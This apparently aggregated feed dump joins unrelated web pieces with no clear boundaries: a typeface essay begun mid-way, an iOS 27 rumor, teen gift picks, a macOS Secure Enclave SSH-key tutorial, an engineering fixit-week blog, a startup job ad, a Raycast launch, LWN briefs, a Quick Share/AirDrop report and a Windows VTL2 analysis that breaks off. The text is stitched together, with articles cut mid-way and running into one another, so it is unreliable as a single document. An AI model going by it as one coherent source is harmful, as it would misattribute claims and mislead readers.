Bell Shakespeare by CHRISTOPHER DOYLE & CO.
Further inspiration for Fran Sans came from the
Letterform Archive
, the world’s leading typography archive, based in San Francisco. Librarian and archivist
Kate Long Stellar
thoughtfully curated a research visit filled with modular typography spanning most of the past century. On the table were two pieces that had a significant impact on Fran Sans and are now personal must-sees at the archive. First, Joan Trochut’s
Tipo Veloz
“Fast Type” (1942) was created during the Second World War when resources were scarce.
Tipo Veloz
gave printers the ability to draw with type, rearranging modular pieces to form letters, ornaments and even illustrations.
Second, Zuzana Licko’s process work for
Lo-Res
(1985), an Emigre typeface, opened new ways of thinking about how ideas move between the physical and the digital and then back again. Seeing how
Lo-Res
was documented through iterations and variations gave the typeface a depth and richness that changed my understanding of how fonts are built. At some point I want to explore physical applications for Fran Sans out of respect for its origins, since it is impossible to fully capture the display’s charm on screen.
Letterform Archive research visit, MAY 2025.
Back at the SFMTA, Armando told me the Breda vehicles are being replaced, and with them their destination displays will be swapped for newer LED dot-matrix units that are more efficient and easier to maintain. By the end of 2025 the signs that inspired Fran Sans will disappear from the city, taking with them a small but distinctive part of the city’s voice.
That feels like a real loss. San Francisco is always reinventing itself, yet its charm lies in how much of its history still shows through. My hope is that Fran Sans can inspire a deeper appreciation for the imperfections that give our lives and our cities character. Life is so rich when ease and efficiency are not the measure.
WITH THANKS
Dave Foster, for being my go-to at every stage of this project.
Maria Doreuli, for thoughtfully reviewing Fran Sans.
Maddy Carrucan, for the words that always keep me dreamy.
Jeremy Menzies, for the photography of the Breda vehicles.
Kate Long Stellar, for curating a research visit on modular typography.
Angie Wang, for suggesting it and helping to make it happen.
Vasiliy Tsurkan, for inviting me into to the SFMTA workshop.
Armando Lumbad, for maintaining the signs that I love so much.
Rick Laubscher, for putting me in touch with the SFMTA.
William Maley Jr, for opening up the TRANS-LITE, INC. archives.
Gary Wallberg, for designing and engineering the original signs.
Gregory Wallberg, for responding to a very suspicious facebook post.
Reddit u/steve31086, for sleuthing the details of William Maley Jr.
This past year, Apple overhauled its design language across all of its major software platforms with the introduction of Liquid Glass. That dramatic redesign, coupled with a number of jam-packed feature releases over the past couple years, has resulted in many Apple users complaining about the overall quality of Apple software.
According to
today’s Power On newsletter
, Apple might finally be stepping back from new features, and instead focusing on underlying performance improvements. Let’s discuss.
iOS 27 to be a ‘Snow Leopard-style update’
Per
Bloomberg’s Mark Gurman
, Apple is taking a step back from launching any major new software features at WWDC26. This applies to iOS 27 and macOS 27, as well as all of the companies smaller platforms, like watchOS, tvOS, and visionOS.
For the first time since iOS 12, Apple will be focusing on software quality, rather than flashy new features:
Aiming to improve the software, engineering teams are now combing through Apple’s operating systems, hunting for bloat to cut, bugs to eliminate, and any opportunity to meaningfully boost performance and overall quality. Like Snow Leopard set the groundwork for future overhauls and new types of Macs, iOS 27 will lay the foundation for foldable iPhones and other new hardware.
Apple won’t quite launch ‘zero new features’ like they claimed with OS X Snow Leopard back in 2009, however. According to Gurman, Apple still plans to release a number of new AI features with iOS 27, so the company doesn’t continue to fall behind in the AI race.
Currently, two major AI features are rumored for iOS 27: Apple’s new AI health agent – launching alongside a potential Apple Health+ subscription, as well as the companies first AI-powered web search feature.
These new features will shortly follow the launch of AI-infused Siri in iOS 26.4, which is largely anticipated to be powered by a special version of Google Gemini. Said custom version of Google Gemini will avoid sending data to Google’s servers, thanks to a custom-built model for Apple’s private cloud compute.
Wrap up
Outside of the heavy focus on software quality and other AI enhancements, Gurman also outlines three additional things to look out for with iOS 27:
Enhancements for enterprise users
‘Bespoke’ features for users in emerging markets
Design tweaks for Liquid Glass
Overall, iOS 27 is shaping up to be the one update that many Apple enthusiasts have wanted for many years: one that just focuses on polishing up the software.
It remains to be seen whether or not iOS 27 will truly feel as polished as iOS 12 or OS X Snow Leopard, but nonetheless, I’m really happy to see Apple is headed in this direction.
Does a renewed focus on stability in iOS 27 excite you? Let us know in the comments.
FTC: We use income earning auto affiliate links.
More.
The 36 best gift ideas for US teens in 2025 – picked by actual teens
Guardian
www.theguardian.com
2025-11-23 18:15:15
‘Clothes … I just want clothes.’ Teenagers tell us what gifts they actually want this year, from Lululemon to slushie machinesThe 47 best gift ideas for US tweens in 2025 – picked by actual tweensSign up for the Filter US newsletter, your weekly guide to buying fewer, better thingsIf AirPods are “fi...
I
f
AirPods
are “fire” and other brands are “mid”, does this mean they’re good? If a fab Lululemon jacket gives your kid “drip”, should you consult a doctor? Teenagers are already tough to decipher. Now try to figure out which consoles they own and which shade of makeup they prefer, and it’s no wonder most parents just resort to cash and gift cards.
But don’t give up just yet. We braved eye rolls and shrugs to extract 36
gift ideas
for teens from teens themselves. Pulling these answers out of angsty coming-of-agers wasn’t easy. But they revealed the most sought-after
gifts for gen Alpha
.
A hoodie from Dandy because they are so comfy and they are awesome quality. Mom, don’t complain that it is expensive! I know I already got a mini dachshund for my birthday.
Bella, 14
New hunting boots and fishing lures. Because I love to go outside and my boots wore out, and I need more fishing lures because the fishies ate mine.
Jack, 13
I want a volleyball to practice for trying out for the school team next year. I’m going to high school next year and want to be good enough to try out for the team.
Ethan, 13
“Because … it’s mini donuts! I want a mini donut making machine so that I can make mini donuts and decorate them. It’s a nice, sweet treat, and when my friends come over, we can make them and have decoration competitions! We can also see who can eat the most donuts the fastest.”
Paige, 13
“I wish to have AirPods or Apple Max headphones, so I can listen to music. That way, I can listen to music privately, during class, or drown out the noise of parents and/or siblings.”
Leilana, 16
“For Christmas, I would like to get an iPad Pro with an Apple Pencil and keyboard attachment. I would like to get this because it would make it easier for me to take notes for school and keep track of them.”
Abby, 16
“I want the new Pokémon game. It’s called Pokémon Legends Z-A. I want it because I like Pokémon games and the new battling features are cool.”
Patrick, 13
“I think these are so cute and so I collect them. I build a town in my room and change things based on a season. So, they are a toy and a decoration.”
Amelie, 12
“I would like to get Pokémon cards for my collection so I can trade with my friends.”
Ali, 15
“I’m hoping for Pokémon cards because it’s a fun hobby of mine. Even if I don’t get the perfect cards, I’m still happy to open the packages.”
Mason, 13
“I really, really, really want an electric scooter because all my friends ride one to school and I am the only one in my friend group that doesn’t have one.”
Malik, 12
“I ask for a new Diary of a Wimpy Kid book every year because they’re good books. I like reading them because I like the stories in the books and it has become a tradition. I get a book every year. And this is the latest one.”
Patrick, 13
“On my Christmas list is a gift card to my favorite bookstore. Usually, the book I want is not yet out, and sometimes I just like picking the book out myself rather than someone choosing one for me.”
Justice, 15
There is a shared library
/usr/lib/ssh-keychain.dylib
that traditionally has been used to add smartcard support
to ssh by implementing
PKCS11Provider
interface. However since recently it also implements
SecurityKeyProivder
which supports loading keys directly from the secure enclave!
SecurityKeyProvider
is what is normally used to talk to FIDO2 devices (e.g.
libfido2
can be used to talk to your Yubikey). However you can now use it to talk to your Secure Enclave instead!
recording.mov
Key setup
See
man sc_auth
and
man ssh-keychain
for all the options
To create a Secure Enclave backed key that requires biometrics, run the
following command and press TouchID:
% sc_auth create-ctk-identity -l ssh -k p-256-ne -t bio
You can confirm that the key was create with the
list-ctk-identities
command:
arian@Mac ssh-keychain % sc_auth list-ctk-identities
Key Type Public Key Hash Prot Label Common Name Email Address Valid To Valid
p-256-ne A71277F0BC5825A7B3576D014F31282A866EF3BC bio ssh ssh 23.11.26, 17:09 YES
It also supports listing the ssh key fingerprints instead:
% sc_auth list-ctk-identities -t ssh
Key Type Public Key Hash Prot Label Common Name Email Address Valid To Valid
p-256-ne SHA256:vs4ByYo+T9M3V8iiDYONMSvx2k5Fj2ujVBWt1j6yzis bio ssh ssh 23.11.26, 17:09 YES
You can "download" the public / private keypair from the secure enclave using the following command:
% ssh-keygen -w /usr/lib/ssh-keychain.dylib -K -N ""
Enter PIN for authenticator:
You may need to touch your authenticator to authorize key download.
Saved ECDSA-SK key to id_ecdsa_sk_rk
% cat id_ecdsa_sk_rk.pub
sk-ecdsa-sha2-nistp256@openssh.com AAAAInNrLWVjZHNhLXNoYTItbmlzdHAyNTZAb3BlbnNzaC5jb20AAAAIbmlzdHAyNTYAAABBBKiHAiAZhcsZ95n85dkNGs9GnbDt0aNOia2gnuknYV2wKL3y0u+d3QrE9cFkmWXIymHZMglL+uJA+6mShY8SeykAAAAEc3NoOg== ssh:
You can just use the empty string for PIN. For some reason
openssh
always asks for
it even if the authenticator in question does not use a PIN but a biometric.
Note that the "private" key here is just a reference to the FIDO credential. It does
not contain any secret key material. Hence I'm specifiyng
-N ""
to skip an encryption
passphrase.
Now if you copy this public key to your authorized keys file, it should work!
Instead of downloading the public/private keypair to a file you can also directly
make the keys available to
ssh-agent
. For this you can use the following command:
SecurityKeyProvider
can be configured in
.ssh/config
but I recommend setting
export SSH_SK_PROVIDER=/usr/lib/ssh-keychain.dylib
in your
.zprofile
instead as
that environment variable gets picked up by
ssh
,
ssh-add
and
ssh-keygen
.
SVG.js has no dependencies and aims to be as small as possible while providing close to complete coverage of the SVG spec. If you're not convinced yet, here are a few highlights.
It's speedy.
SVG.js is fast. Obviously not as fast as vanilla js, but many times faster than the competition:
Index:
rects
:
generate 10000 rects
fill
:
generate 10000 rects with fill color
gradient
:
generate 10000 rects with gradient fill
Less is better. Tested on an Intel Core i7-4702MQ @ 2.2GHz.
Easy readable, uncluttered syntax.
Creating and manipulating SVG using JavaScript alone is pretty verbose. For example, just creating a simple pink square requires quite a lot of code:
SVG.js provides a syntax that is concise and easy to read. Doing the same as the vanilla js example above:
// SVG.js
var draw = SVG().addTo('#drawing')
, rect = draw.rect(100, 100).fill('#f06')
That's just
two
lines of code instead of
ten
! And a whole lot less repetition.
Go crazy with animations
There is more...
animations
on size, position, transformations, color, ...
It’s Friday at 4pm. I’ve just closed my 12th bug of the week. My brain is completely fried. And I’m staring at the bug leaderboard, genuinely sad that Monday means going back to regular work. Which is weird because I
love
regular work. But fixit weeks have a special place in my heart.
What’s a fixit, you ask?
Once a quarter, my org with ~45 software engineers stops all regular work for a week. That means no roadmap work, no design work, no meetings or standups.
Instead, we fix the small things that have been annoying us and our users:
an error message that’s been unclear for two years
a weird glitch when the user scrolls and zooms at the same time
a test which runs slower than it should, slowing down CI for everyone
The rules are simple: 1) no bug should take over 2 days and 2) all work should focus on either small end-user bugs/features or developer productivity.
We also have a “points system” for bugs and a leaderboard showing how many points people have. And there’s a promise of t-shirts for various achievements: first bug fix, most points, most annoying bug, etc. It’s a simple structure, but it works surprisingly well.
What we achieved
Some stats from this fixit:
189 bugs fixed
40 people participated
4 was the median number of bugs closed per person
12 was maximum number of bugs closed by one person
Bug Burndown Chart for the Q4'25 Fixit
Here are some of the highlights (sadly many people in my org work in internal-facing things so I cannot share their work!):
I closed a
feature request
from 2021! It’s a classic fixit issue: a small improvement that never bubbled to the priority list. It took me
one day
to implement. One day for something that sat there for
four years
. And it’s going to provide a small but significant boost to every user’s experience of Perfetto.
My colleague made this
small change
to improve team productivity. Just ~25 lines of code in a GitHub Action to avoid every UI developer taking two extra clicks to open the CI’s build. The response from the team speaks for itself:
Such a simple change but the team loved it!
I also fixed
this
issue to provide a new “amalgamated” version of our SDK, allowing it to be easily integrated into projects. It’s one of those things that might be the difference between someone deciding to use us or not, but building it took just one hour of work (with liberal use of AI!).
The benefits of fixits
For the product: craftsmanship and care
I care deeply about any product I work on. That means asking big questions like “what should we build?” and “how do we make this fast?” But it also means asking smaller questions: “is this error message actually helpful?” or “would I be frustrated using this?”
A hallmark of any good product is attention to detail: a sense that someone has thought things through, and the pieces fit together to make a cohesive whole. And the opposite is true: a product with rough edges might be tolerated if there are no alternatives, but there will always be a sense of frustration and “I wish I could use something else”.
Fixits are a great chance to work on exactly those details that separate good products from great ones. The small things your average user might not consciously notice, but absolutely will notice if they’re wrong.
For the individual: doing, not thinking
I sometimes miss the feeling I had earlier in my career when I got to just fix things. See something broken, fix it, ship it the same day.
The more senior you get in a big company, the less you do that. Most of your time becomes thinking about what to build next, planning quarters ahead, navigating tradeoffs and getting alignment.
Fixits give me that early-career feeling back. You see the bug, you fix it, you ship it, you close it, you move on. There’s something deeply satisfying about work where the question isn’t “what should we do?” but rather “can I make this better?” And you get to answer that question multiple times in a week.
For the team: morale and spirit
People sharing live updates in the Fixit chatroom
Having 40 people across two time zones all fixing bugs together adds a whole other dimension.
The vibe of the office is different: normally we’re all heads-down on different projects, but during fixit the team spirit comes out strong. People share their bug fixes in chat rooms, post before-and-after screenshots and gather around monitors to demo a new feature or complain about a particularly nasty bug they’re wrestling.
The daily update from Friday
The leaderboard amplifies this energy. There’s a friendly sense of competition as people try and balance quick wins with meatier bugs they can share stories about.
There’s also a short update every morning about how the previous day went:
total bugs fixed
how many people have fixed at least one bug
how many different products we’ve fixed things in
who’s currently at the top of the leaderboard
All of this creates real momentum, and people feel magnetically pulled into the effort.
How to run a fixit
I’ve participated in 6 fixits over the years and I’ve learned a lot about what makes them successful. Here are a few things that matter more than you’d think.
Preparation is key
Most of what makes a fixit work happens before the week even starts.
All year round, we encourage everyone to tag bugs as “good fixit candidates” as they encounter them. Then the week before fixit, each subteam goes through these bugs and sizes them:
small (less than half a day)
medium (less than a day)
large (less than 2 days).
They assign points accordingly: 1, 2, or 4.
We also create a shortlist of high-priority bugs we really want fixed. People start there and move to the full list once those are done. This pre-work is critical: it prevents wasting day one with people aimlessly searching for bugs to fix.
The 2-day hard limit
In one of our early fixits, someone picked up what looked like a straightforward bug. It should have been a few hours, maybe half a day. But it turned into a rabbit hole. Dependencies on other systems, unexpected edge cases, code that hadn’t been touched in years.
They spent the entire fixit week on it. And then the entire week after fixit trying to finish it. What started as a bug fix turned into a mini project.
The work was valuable! But they missed the whole point of a fixit. No closing bugs throughout the week. No momentum. No dopamine hits from shipping fixes. Just one long slog.
That’s why we have the 2-day hard limit now. If something is ballooning, cut your losses. File a proper bug, move it to the backlog, pick something else. The limit isn’t about the work being worthless - it’s about keeping fixit feeling like fixit.
Number of people matters
We didn’t always do fixits with 40 people. Early on, this wasn’t an org-wide effort, just my subteam of 7 people. It worked okay: bugs got fixed and there was a sense of pride in making the product better. But it felt a bit hollow: in the bigger picture of our org, it didn’t feel like anyone else noticed or cared.
At ~40 people, it feels like a critical mass that changes things significantly. The magic number is probably somewhere between 7 and 40. And it probably varies based on the team. But whatever the number is, the collective energy matters. If you’re trying this with 5 people, it might still be worth doing, but it probably won’t feel the same.
Gamification
The points and leaderboard are more than a gimmick, but they have to be handled carefully.
What works for us:
Points are coarse, not precise
: We deliberately use 1/2/4 points instead of trying to measure exact effort; the goal is “roughly right and fun”, not accurate performance evaluation.
Celebrate breadth, not just volume.
We give t-shirts for things like “first bug fix”, “most annoying bug fixed”, not just “most points”. That keeps newer or less experienced engineers engaged.
Visibility over prizes.
A shout-out in the daily update or an internal post often matters more than the actual t-shirt.
No attachment to perf reviews
. This is important: fixit scores do
not
feed into performance reviews. The moment they do, people will start gaming it and the good vibe will die.
We’ve had very little “gaming” in practice. Social norms do a good job of keeping people honest and 40 is still small enough that there’s a sense of “loyalty to the cause” from folks.
The AI factor
The big challenge with fixits is context switching. Constantly changing what you’re working on means constantly figuring out new parts of the codebase, thinking about new problems.
AI tools have mitigated this in a big way. The code they write is less important than their ability to quickly search through relevant files and summarize what needs to change. They might be right or wrong, but having that starting point really reduces the cognitive load. And sometimes (rarely) they one-shot a fix.
This
docs change
was a perfect example of the above: an update to our docs which catches out new contributors and AI was able to one-shot the fix.
On the other hand, in my
record page change
it was more useful for giving me prototypes of what the code should look like and I had to put in significant effort to correct the bad UX it generated and its tendency to “over-generate” code. Even so, it got me to the starting line much faster.
Criticisms of fixits (and why I still like them anyway)
I’ve definitely come across people who question whether fixits are actually a good idea. Some of the criticisms are fair but overall I still think it’s worth it.
“Isn’t this just admitting you ignore bugs the rest of the time?”
To some extent, yes, this is an admission of the fact that “papercut” bugs are underweighted in importance, both by managers and engineers. It’s all too easy to tunnel on making sure a big project is successful and easier to ignore the small annoyances for users and the team.
Fixits are a way of counterbalancing that somewhat and saying “actually those bugs matter too”. That’s not to say we don’t fix important bugs during regular work; we absolutely do. But fixits recognize that there should be a place for handling the “this is slightly annoying but never quite urgent enough” class of problems.
The whole reason we started fixits in the first place is that we observed these bugs never get actioned. Given this, I think carving out some explicit time for it is a good thing.
“Isn’t it a waste to pause roadmap work for a whole week?”
It’s definitely a tradeoff. 40 engineer-weeks is a
lot
of manpower and there’s an argument to be made it should be used for actually solving roadmap problems.
But I think this underweights the importance of polish of products to users. We’ve consistently found that the product feels noticeably better afterward (including positive comments from users about things they notice!) and there’s a sense of
pride
in having a well-functioning product.
Also, many of the team productivity fixes compound (faster tests, clearer errors, smoother workflows) so the benefits carry forward well beyond the week itself.
This only works at big companies!
I agree that a full week might be too much for tiny teams or startups. But you can still borrow the idea in smaller chunks: a “fixit Friday” once a month, or a 2-day mini-fixit each quarter. The core idea is the same: protected, collective time to fix the stuff people complain about but no one schedules time to address.
Fixits are good for the soul
The official justification for fixits is that they improve product quality and
developer productivity. And of course they do this.
But the unofficial reason I love them is simpler: it just feels good to fix things. It takes me back to a simpler time, and putting thought and attention into building great products is a big part of my ethos for how software engineering should be done. I wouldn’t want to work like that all the time. But I also wouldn’t want to work somewhere that never makes time for it.
If you enjoyed this post, you can
subscribe
to my weekly roundup of recent posts, or follow via
RSS
.
I’m not saying this will definitely happen, but I think we could be on the cusp of a significant shift in Windows market share for consumer computers. It is not going to drop to 2% in a year or anything, but I feel like a few pieces are coming together that could move the needle in a way we have not seen in several decades. There are three things on my mind .
Number one is that Microsoft just does not feel like a consumer tech company at all anymore. Yes, they have always been much more corporate than the likes of Apple or Google, but it really shows in the last few years as they seem to only have energy for AI and web services. If you are not a customer who is a major business or a developer creating the next AI-powered app, Microsoft does not seem to care about you.
I just do not see excitement there. The only thing of note they have added to Windows in the last five years is Copilot, and I have yet to meet a normal human being who enjoys using it. And all the Windows 11 changes seem to have just gone over about as well as a lead balloon. I just do not think they care at all about Windows with consumers.
The second thing is the affordable MacBook rumored to be coming out in 2026. This will be a meaningfully cheaper MacBook that people can purchase at price points that many Windows computers have been hovering around for many years. Considering Apple’s focus on consumers first and a price point that can get more people in the door, it seems like that could move the needle.
The third thing is gamers. Gamers use Windows largely because they have to, not because they are passionate about it. Maybe they were passionate about it in the 90s, but any passion has gone away. Now it is just the operating system they use to launch Steam. In early 2026, Valve is going to release the Steam Machine after a few years of success with the Steam Deck. We will see how they do there, but what they are doing is releasing a machine that runs Windows games on Linux. And it runs them really well. The Steam Deck has proven that over the last few years. If someone can package up a version of Linux that is optimized for gamers, then I think there is a meaningful number of PC gamers who would happily run that on their computer instead.
I do not know if this is going to happen. It is always easy to be cynical and suggest everything will stay the same, and I understand that markets of this size take a long time to change. However, it just feels like there are some things happening right now that are going to move the needle, and I am excited to see what happens.
At HumanLayer, we’re on a mission to change how teams build software with AI. If we had a motto it would be “no vibes allowed” - we believe that AI agent-enabled coding is a
deeply technical engineering craft
, and we’re building CodeLayer to unlock it at scale. A Stanford study from June 2025 said AI can’t solve hard problems or work well in complex or legacy codebases, and we’re proving them wrong with advanced techniques inspired by Context Engineering (a term originally coined by our CEO Dex in April 2025). Learn more about our mission and learnings at
https://hlyr.dev/ace-fca
Our product is an Agentic IDE built on claude code that helps CTOs and VPEs drive the transition to 99% AI-written code in their engineering orgs. Our MRR grew 100% last month, and we’re bringing on a founding engineer who loves to ship like crazy and get in the weeds with customers to solve big problems in AI Developer Productivity.
You…
Work across the entire stack - frontend apps, backend services, native executables, infrastructure, CI
Have deep experience building in the Typescript ecosystem. We use it across the entire stack - frontend, backend, native executables, infrastructure-as-code.
Ship like an engineer, think like a product owner. You have deep empathy for users and are dedicated to creating a world-class user experience.
Strong in CS fundamentals - operating systems, networking, data structures.
You’re a 99th-percentile Claude Code or Codex user
You know Postgres/MySQL like the back of your hand
Love working with customers to solve their problems. Expect to be forward-deployed to help onboard new customers.
Enjoy hotkeymaxxing - vim, superhuman, RTS games, etc.
Are familiar with auth’n/z - OAuth 2.0, etc.
Are located in SF or willing to relocate (we’ll cover reasonable relocation costs!)
We:
Work 70 hours/week in-person in SF (Marina/Russian Hill)
Are growing rapidly and onboarding design partners. We grew 100% last month and expect to do it again.
Have raised > 3M from YC, Pioneer Fund, and angels including Guillermo Rauch, Paul Klein, and .
Believe you should make it run, make it right, make it fast. Our #1 goal is deliver value for developers. Refactor
after
patterns emerge
CodeLayer is the best way to get AI to solve hard problems in complex codebases. We help CTOs and VPEs drive the transition to 99% AI-written code in their engineering orgs.
We grew 100% in the last month, we welcomed two YC customers with 50-100 person engineering teams, and we're in paid pilots with several publicly-traded teams with thousands of engineers.
The fetish modern Internet users have with “dark mode” has to stop, as does the rhetoric they typically use to advance their arguments, stuff like:
blasts my eyeballs with full-beam daylight.
or
Every time I open it, I physically recoil like a Victorian child seeing electricity for the first time.
or
My retinas and I would be very grateful
or
the light of a thousand suns
Give me a break. If normal mode bothers you so much, it says one thing:
your ambient lighting is crap
. That will kill your eyesight and no, dark mode won’t save you. Fix your lighting instead of bullying the rest of the Internet into eyesight-damaging practices.
Calculus for Mathematicians, Computer Scientists, and Physicists [pdf]
You know the feeling. Search that can't find your files. Apps buried in menus. Simple tasks that take too many clicks. Your computer should be faster than this. It should feel like everything is at your fingertips. That’s why we built Raycast.
For the past five and a half years, hundreds of thousands of people on Mac have used Raycast daily to cut through the noise. Now, it's time for a new start. We’re excited to announce that
Raycast for Windows is in public beta
. Available today.
Raycast on Windows uses familiar keyboard shortcuts, comes with a design that fits right in, and even lets you search your games alongside your apps. We built it to feel like it belongs here, not like something ported over.
One of the hardest parts was file search. Windows doesn't have a system-wide index that meets our standards, so we built one from scratch. Our custom indexer scans your files in real time and delivers instant results. It’s the kind of search you'd expect from Raycast.
Raycast comes with an extension platform. You can
control your smart home
without opening an app,
translate text
without switching to a browser, search your
Notion
workspace in seconds, manage
GitHub
pull requests, find the perfect
GIF
, or check
Linear
issues. All from one place.
We have thousands of extensions in our ecosystem and hundreds already work on Windows. More are being added every day as developers bring their work to the platform. Simply browse the
Store
, install what you need, and start using it immediately.
Can't find what you're looking for? Build it yourself! Extensions are built with React and TypeScript. So if you know web development, you already know how to build for Raycast. Our
developer documentation
walks you through it. And because our API is designed to be cross-platform, most extensions work on both Mac and Windows out of the box.
During the public beta, Quick AI is free without a subscription. Just launch Raycast with your hotkey, type a question, and hit Tab to get an answer with citations.
Powered by OpenAI's GPT-5 mini, it can handle a variety of tasks from quick lookups to deeper research questions. We want you to experience how natural it feels when AI is just there, ready when you need it. While we don’t support all Pro features on Windows yet, you can optionally
upgrade
to select from more LLMs if you wish.
The public beta includes all the features that make Raycast indispensable. Launch apps instantly, manage windows with keyboard shortcuts, access your Clipboard History, navigate with Quicklinks, expand Snippets as you type, search files across your entire system, and explore lots of extensions.
And this is just the start. We're bringing AI Chat, Notes, and more features to Windows in the coming months. We ship updates regularly, so you'll see the app evolve quickly. The goal is to make Raycast on Windows as powerful as it is on macOS.
Over the past few months, thousands of you have been testing Raycast for Windows and giving us feedback. You've helped us make this better and we couldn't have done this without you. Thanks a lot for your support! As this is a public beta, there will be bugs and issues to work through. So please keep your feedback coming.
Setup Raycast on your PC today and experience what frictionless work feels like.
Ask HN: Good resources to learn financial systems engineering?
I work mainly in energy market communications and systems that facilitate energy trading, balancing and such. Currently most parties there take minutes to process messages and I think there could be a lot to learn from financial systems engineering. Any good resources you can recommend?
Racket 9.0 released
Linux Weekly News
lwn.net
2025-11-23 16:27:46
The Racket programming language
project has released Racket
version 9.0. Racket is a descendant of Scheme, so it is part of the Lisp family of languages. The headline feature in the release is parallel
threads, which adds to the concurrency tools in the language: "While
Racket has had green threads ...
The
Racket programming language
project has
released Racket
version 9.0
. Racket is a descendant of
Scheme
, so it is part of the Lisp family of languages. The headline feature in the release is
parallel
threads
, which adds to the concurrency tools in the language: "
While
Racket has had green threads for some time, and supports parallelism via
futures and places, we feel parallel threads is a major addition.
"
Other new features include the
black-box
wrapper to prevent the compiler from optimizing calculations away, the
decompile-linklet
function to map
linklets
back to an
s-expression
, the
addition of
Weibull
distributions
to the math library, and more.
Improving GCC Buffer Overflow Detection for C Flexible Array Members (Oracle)
Linux Weekly News
lwn.net
2025-11-23 16:08:32
The Oracle blog has a
lengthy article on enhancements to GCC to help detect overflows of
flexible array members (FAMs) in C programs.
We describe here two new GNU extensions which specify size
information for FAMs. These are a new attribute,
"counted_by" and a new builtin function,
"__builtin_...
The Oracle blog has
a
lengthy article
on enhancements to GCC to help detect overflows of
flexible array members (FAMs) in C programs.
We describe here two new GNU extensions which specify size
information for FAMs. These are a new attribute,
"
counted_by
" and a new builtin function,
"
__builtin_counted_by_ref
". Both extensions can be used in
GNU C applications to specify size information for FAMs, improving
the buffer overflow detection for FAMs in general.
The 2025 Linux Foundation Technical Advisory Board election
Linux Weekly News
lwn.net
2025-11-23 15:45:01
The call for
candidates for the 2025 election for the Linux Foundation Technical
Advisory Board has been posted.
The TAB exists to provide advice from the kernel community to the
Linux Foundation and holds a seat on the LF's board of directors;
it also serves to facilitate interactions both wit...
The
call for
candidates
for the 2025 election for the Linux Foundation Technical
Advisory Board has been posted.
The TAB exists to provide advice from the kernel community to the
Linux Foundation and holds a seat on the LF's board of directors;
it also serves to facilitate interactions both within the community
and with outside entities. Over the last year, the TAB has
overseen the organization of the Linux Plumbers Conference, advised
on the setup of the kernel CVE numbering authority, worked behind
the scenes to help resolve a number of contentious community
discussions, worked with the Linux Foundation on community
conference planning, and more.
Nominations close on December 13.
Inmates at a Mississippi jail were ordered to do the guards' bidding
Google enables Pixel-to-iPhone file sharing via Quick Share, AirDrop
Bleeping Computer
www.bleepingcomputer.com
2025-11-23 15:32:46
Google has added interoperability support between Android Quick Share and Apple AirDrop, to let users share files between Pixel devices and iPhones. [...]...
Google has added interoperability support between Android Quick Share and Apple AirDrop, to let users share files between Pixel devices and iPhones.
For now, only Pixel 10-series devices support the new data transmission and reception capability, but more Android models will follow.
Quick Share (formerly Nearby Share) is Android's built-in wireless file-sharing system for sending media, documents, and other files between Android devices over Bluetooth or Wi-Fi Direct.
AirDrop is Apple's equivalent system, which, so far, has only worked for sharing files among iPhones, iPads, and Macs.
Both systems are proprietary and follow different technical approaches, each using its own discovery protocol, authentication flow, and packet formats and parsers.
The lack of a common communication standard between Apple and Google devices restricted users to sharing files with peers in the same ecosystem.
Google announced that this lockdown has been lifted, and people can now share or receive files from or to iOS devices in a secure way.
"As part of our efforts to continue to make cross-platform communication more seamless for users, we've made Quick Share interoperable with AirDrop, allowing for two-way file sharing between Android and iOS devices, starting with the Pixel 10 Family,"
reads the announcement
.
"This new feature makes it possible to quickly share your photos, videos, and files with people you choose to communicate with, without worrying about the kind of phone they use."
The tech giant assures users that the new file-sharing system was built with security at its core, adhering to its strict development safeguards, including threat modeling, internal security and privacy reviews, and internal penetration testing.
An independent audit by NetSPI, a cybersecurity company specializing in penetration testing, attack surface management, and breach simulation,
confirmed
that the new system is robust and that there are no data leakages.
Google's announcement also highlighted that the Rust programming language had a key role in this implementation, to parse wireless data packages while eliminating "entire classes of memory-safety vulnerabilities by design."
The implementation uses AirDrop's "Everyone for 10 minutes" mode for a direct, device-to-device connection that doesn't involve server intermediaries or any point where data logging may occur.
Users are expected to manually verify that the device they see on their screen belongs to the person they want to connect with, so caution is advised in this step, not to accidentally share sensitive content with a random device nearby.
Google notes that this mode is the first step in establishing interoperability, and with Apple's collaboration, they seek to enable a "Contacts Only" mode in future releases.
BleepingComputer has contacted Apple to request a comment on this possibility and how open they are to working towards interoperability with Android, but a response wasn't immediately available.
It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.
Learn how top leaders are turning investment into measurable impact.
The Virtual Secure Mode (VSM) mechanism is a data protection and isolation technology in Windows, implemented through virtualization.
In a previous article(
深入解析Windows VTL机制 & IUM进程
),we introduced the Windows VTL mechanism and the IUM process. Interested readers may revisit that content.
Let’s briefly review the concept of VTL (Virtual Trust Levels). MSDN describes it as follows:
VSM achieves and maintains isolation through Virtual Trust Levels (VTLs). VTLs are enabled and managed on both a per-partition and per-virtual processor basis.
Virtual Trust Levels are hierarchical, with higher levels being more privileged than lower levels. VTL0 is the least privileged level, with VTL1 being more privileged than VTL0, VTL2 being more privileged than VTL1, etc.
Architecturally, up to 16 levels of VTLs are supported; however a hypervisor may choose to implement fewer than 16 VTL’s. Currently, only two VTLs are implemented.
Each VTL has its own set of memory access protections. These access protections are managed by the hypervisor in a partition’s physical address space, and thus cannot be modified by system level software running in the partition.
Since more privileged VTLs can enforce their own memory protections, higher VTLs can effectively protect areas of memory from lower VTLs. In practice, this allows a lower VTL to protect isolated memory regions by securing them with a higher VTL. For example, VTL0 could store a secret in VTL1, at which point only VTL1 could access it. Even if VTL0 is compromised, the secret would be safe.
According to Microsoft documentation, Windows currently supports up to two VTL levels—VTL0 and VTL1. These two levels were analyzed in detail in the earlier article and won’t be repeated here. Higher VTL levels are more secure, and lower VTLs cannot modify (or even access) the data of higher ones.
But reality tells a different story.
In fact, Microsoft has quietly added support for VTL2 and extensively deployed it in their commercial Azure cloud platform.
2. The Disappearing VMSP Process
It all began with an unexpected discovery.
While creating a VM in Azure Local using an Azure Marketplace image, I selected
Security type
as
Trusted Launch virtual machines
, as shown below:
Both images I downloaded from the Azure Marketplace supported the
Trusted Launch
feature.
Once the VM was created, I checked it from the Host. To my surprise, these
Trusted Launch
VMs did not start a VMSP process to support vTPM, as shown below:
There was no VMSP process corresponding to the VMWP process (for those unfamiliar with VMSP, refer to the earlier article. In short, enabling vTPM normally spawns a VMSP process paired with the VMWP process).
At first, I thought
Trusted Launch
VMs simply disabled vTPM by default. But I was wrong. Checking the VM’s security configuration confirmed that TPM was enabled:
